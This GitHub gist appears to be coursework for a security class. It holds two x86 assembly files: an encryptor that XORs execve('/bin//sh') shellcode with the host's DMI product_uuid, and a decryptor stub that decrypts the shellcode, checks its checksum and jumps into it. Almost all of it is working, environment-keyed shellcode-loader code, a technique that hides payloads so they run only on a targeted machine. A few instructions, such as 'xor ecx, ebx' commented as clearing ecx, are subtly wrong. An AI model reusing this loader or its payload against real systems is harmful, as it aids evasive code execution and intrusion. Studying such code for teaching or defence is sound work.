Skip to content

Instantly share code, notes, and snippets.

@wideglide

wideglide/shellcode_decrypt.asm

Created March 27, 2019 22:11
Show Gist options
  • Save wideglide/8b0aa5cf17b44324c7f8c4717332abdf to your computer and use it in GitHub Desktop.
Save wideglide/8b0aa5cf17b44324c7f8c4717332abdf to your computer and use it in GitHub Desktop.
Download ZIP
encryptor shellcode
Raw
shellcode_decrypt.asm
;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: decrypt_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f bin decrypt_uuid.asm
SYS_READ equ 0x03
SYS_WRITE equ 0x04
SYS_OPEN equ 0x05
SYS_EXECVE equ 0x0B
SYS_MMAP equ 0x5a
SYS_BRK equ 0x7d
USE32
section .text
mov ebp, esp ; setup internal frame pointer
sub sp, 1023 ; local variable area
and esp, -16 ; 16-byte align stack
mov [ebp-4], esp ; save stack buffer
cld ; clear direction, es/di count up
xor ecx, ecx ; clear ecx
jmp short get_shellcode
got_shellcode:
pop esi ; address of shellcode
mov edi, [ebp-4] ; dest = heap address
mov cl, 8 ; count double-word to mov (32 bytes)
rep movsd ; mov ecx DW from esi to edi
xor eax, eax ; clear eax
mov edx, eax ; mode is ignored
mov ecx, eax ; flags = O_RDONLY
jmp get_uuid
got_uuid:
pop ebx ; pathname = uuid
mov al, SYS_OPEN ;
int 0x80 ; open(ebx, ecx, edx)
xor edx, edx ; clear edx
mov dl, 32 ; count = 32
lea ecx, [ebp-48] ; buf = [ebp-48]
mov ebx, eax ; fd = eax = return from open
xor eax, eax
mov al, SYS_READ
int 0x80 ; read(ebx, ecx, edx)
xor ebx, ebx ; clear ebx
mov ecx, ebx ; clear ecx
mov cl, 8 ; LEN of shellcode (?)
mov esi, [ebp-4] ; source shellcode in mapped page
mov edi, [ebp-4] ; dest shellcode in mapped page
decrypt:
mov edx, [ebp+ebx*4-48] ; load XOR key
lodsd ; load DW from heap
xor eax, edx ;
stosd ; store result (DW)
inc ebx ; increment xor key location
and bl, 0x03 ; MOD 4
dec ecx
test ecx, ecx ; check zero
jnz decrypt
mov bl, 28 ; length of data to checksum
xor eax, eax ; clear eax
mov esi, [ebp-4] ; source of shellcode (decrypted)
check:
lodsb
add ecx, eax ; accumulate bytes
dec ebx ; decrement count
test bl, bl
jnz check
not ecx ; complement sum
lodsd ; load checksum in eax
cmp ecx, eax ; checksum match?
jnz exit
mov eax, [ebp-4] ; address of shellcode
jmp eax
exit:
xor eax, eax ; clear eax
mov ebx, eax ; clear ebx
inc eax ; sys_exit = 1
int 0x80 ; exit(0)
get_shellcode:
call got_shellcode ; address of shellcode pushed
shellcode:
incbin "shellcode_encrypted"
ret
get_uuid:
call got_uuid
;uuid db '/sys/class/dmi/id/product_uuid',0
uuid db 'product_uuid',0
Raw
shellcode_encrypt.asm
;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: shellcode_enc_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f elf shellcode_enc_uuid.asm
; ld -melf_i386 -o encryptor shellcode_enc_uuid.o
SYS_EXECVE equ 0x0B
SYS_READ equ 0x03
SYS_WRITE equ 0x04
SYS_OPEN equ 0x05
SYS_BRK equ 0x7d
USE32
global _start
section .data
; example product_uuid DD524D56-CD3E-FA50-6CBD-2EA4812B680D
; uuid db '/sys/class/dmi/id/product_uuid',0
uuid db 'product_uuid',0
uuid_len equ $ - uuid
sc_enc db 'shellcode_encrypted',0
sc_end_len equ $ - sc_enc
section .bss
buffer: resb 128
section .text
_start:
lea eax, [esp + 4]
mov ebx, [esp]
push eax
push ebx
call main
add esp, 8
mov ebx, eax
mov eax, 1
int 0x80
;--------------------------------------------
; int l_read(int fd, char *buf, int len);
; read len bytes from file fd to the buffer buf.
; Return the number of bytes actually written.
;--------------------------------------------
l_read:
push ebp ; save callers frame pointer
mov ebp, esp ; setup internal frame pointer
push ebx ;save ebx
mov edx, [ebp + 16] ; arg3 - int len
mov ecx, [ebp + 12] ; arg2 - char *buf
mov ebx, [ebp + 8] ; arg1 - int fd
mov eax, 3 ; syscall 3 = read
int 0x80 ; call read(ebx, ecx, edx)
pop ebx ; restor ebx
mov esp, ebp ; restore esp
pop ebp ; restore caller's fp
ret
;--------------------------------------------
; int l_write(int fd, char *buf, int len);
; write len bytes from buffer buf to file fd.
; Return the number of bytes actually written.
;--------------------------------------------
l_write:
push ebp ; save callers frame pointer
mov ebp, esp ; setup internal frame pointer
push ebx ;save ebx
mov edx, [ebp + 16] ; arg3 - int len
mov ecx, [ebp + 12] ; arg2 - char *buf
mov ebx, [ebp + 8] ; arg1 - int fd
mov eax, 4 ; syscall 4 = write
int 0x80 ; call write(ebx, ecx, edx)
pop ebx ; restor ebx
mov esp, ebp ; restore esp
pop ebp ; restore caller's fp
ret
;--------------------------------------------
; int l_open(char *filename, int flags);
; open the file specified by the filename/pathnaem
; Return the file descriptor for the open file.
;--------------------------------------------
l_open:
push ebp ; save callers frame pointer
mov ebp, esp ; setup internal frame pointer
push ebx ;save ebx
mov edx, [ebp + 16] ; arg3 - int mode
mov ecx, [ebp + 12] ; arg2 - int flags
mov ebx, [ebp + 8] ; arg1 - char *filename
mov eax, 5 ; syscall 5 = open
int 0x80 ; call open(ebx, ecx, edx)
pop ebx ; restor ebx
mov esp, ebp ; restore esp
pop ebp ; restore caller's fp
ret
;--------------------------------------------
; int l_exit(int rc);
; terminate the calling program with exit code rc.
;--------------------------------------------
l_exit:
mov ebx, [esp + 4] ; arg1 - int rc
mov eax, 1
int 0x80
main:
push ebp ; save callers frame pointer
mov ebp, esp ; setup internal frame pointer
push ebx ; save ebx
sub esp, 1024 ; local variable area
xor ebx, ebx ; NULL
mov eax, 0x2d ; syscall sys_brk
int 0x80
mov [ebp-4], eax ; save heap address
add eax, 4096 ; unsigned long brk
mov ebx, eax
mov eax, 0x2d ; syscall 0x2d = sys_brk
int 0x80 ; call sys_brk(ebx)
cld ; clear direction, es/di count up
mov esi, shellcode ; src = shellcode
mov edi, [ebp-4] ; dest = heap address
mov ecx, 8 ; count double-word to mov (32 bytes)
rep movsd ; mov ecx DW from esi to edi
xor eax, eax ; clear eax
push eax ; mode is ingored
push eax ; flags = O_RDONLY
push uuid ;
call l_open ; open(uuid, O_RDONLY)
push 32 ; count = 32
lea ebx, [ebp-48]
push ebx ; buf = [ebp-48]
push eax ; fd = eax
call l_read ; read(fd, [ebp-48], 32)
xor ecx, ebx ; clear ecx
mov ebx, 28 ; length of checksum data
mov esi, [ebp-4] ; address of shellcode
check:
lodsb
add ecx, eax ; sum shellcode bytes
dec ebx
test ebx, ebx ; check zero
jnz check
not ecx ; complement sum
mov eax, ecx ; checksum in eax
mov edi, esi ; prepare to store
stosd ; store checksum
mov ecx, 8 ; LEN of shellcode (?)
mov esi, [ebp-4] ; source shellcode in heap
mov edi, [ebp-4] ; dest shellcode in heap
encrypt:
mov edx, [ebp+ebx*4-48] ; load XOR key
lodsd ; load DW from heap
xor eax, edx ;
stosd ; store result (DW)
inc ebx ; increment xor key location
and bl, 0x03 ; MOD 4
dec ecx
test ecx, ecx ; check zero
jnz encrypt
push 664q ; mode
push 0x242 ; O_RDWR|O_CREAT|O_TRUNC
push sc_enc ; filename = ""
call l_open ; open(sc_enc, ..., 0664)
push 32 ; count = 32
mov ebx, [ebp-4] ; heap address
push ebx
push eax ; fd = eax
call l_write ; write(fd, [ebp-48], 32)
xor eax, eax
mov esp, ebp ; restore esp
pop ebp ; restore caller's fp
ret
;syscall %eax %ebx,%ecx,%edx
;----------- ---- ---------------------------------------------------------------
;exec x00b ->path="/bin//sh",->[->a0=path,0]
shellcode:
xor eax,eax ;zero eax
sub esp, 127 ;create room on stack
push eax ;null terminate "/bin//sh"
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;argv[0]
push eax ;null terminate argv list
push ebx ;argv[0]
mov ecx, esp ;argv
cdq ;zero edx
mov al, SYS_EXECVE
int 0x80
nop
nop
nop
nop
nop
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment